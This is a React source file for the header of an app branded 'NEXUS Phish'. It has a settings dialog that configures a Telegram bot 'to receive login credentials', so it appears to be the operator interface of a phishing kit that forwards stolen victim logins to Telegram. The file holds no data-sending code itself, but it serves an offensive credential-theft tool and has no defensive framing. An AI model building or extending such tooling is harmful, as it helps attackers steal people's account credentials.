
import React from 'react';
import { Link } from 'react-router-dom';
import { useCredentials } from '@/contexts/CredentialsContext';
import { Button } from '@/components/ui/button';
import { Dialog, DialogContent, DialogDescription, DialogHeader, DialogTitle, DialogTrigger } from '@/components/ui/dialog';
import { Settings } from 'lucide-react';
import TelegramModal from './TelegramModal';

const Header: React.FC = () => {
  const { isTelegramConfigured } = useCredentials();
  
  return (
    <header className="fixed top-0 left-0 right-0 z-50 bg-background/80 backdrop-blur-md border-b border-border">
      <div className="container mx-auto px-6 h-16 flex items-center justify-between">
        <Link 
          to="/" 
          className="text-xl font-semibold tracking-tight text-foreground flex items-center gap-2 transition-all hover:opacity-80"
        >
          <span className="sr-only">NEXUS Phish</span>
          NEXUS Phish
        </Link>
        
        <div className="flex items-center gap-4">
          <Dialog>
            <DialogTrigger asChild>
              <Button 
                variant="ghost" 
                size="icon" 
                className="relative"
              >
                <Settings className="h-5 w-5" />
                {!isTelegramConfigured && (
                  <span className="absolute -top-1 -right-1 w-3 h-3 bg-destructive rounded-full"></span>
                )}
              </Button>
            </DialogTrigger>
            <DialogContent className="sm:max-w-[425px]">
              <DialogHeader>
                <DialogTitle>Telegram Configuration</DialogTitle>
                <DialogDescription>
                  Configure your Telegram bot to receive login credentials.
                </DialogDescription>
              </DialogHeader>
              <TelegramModal />
            </DialogContent>
          </Dialog>
        </div>
      </div>
    </header>
  );
};

export default Header;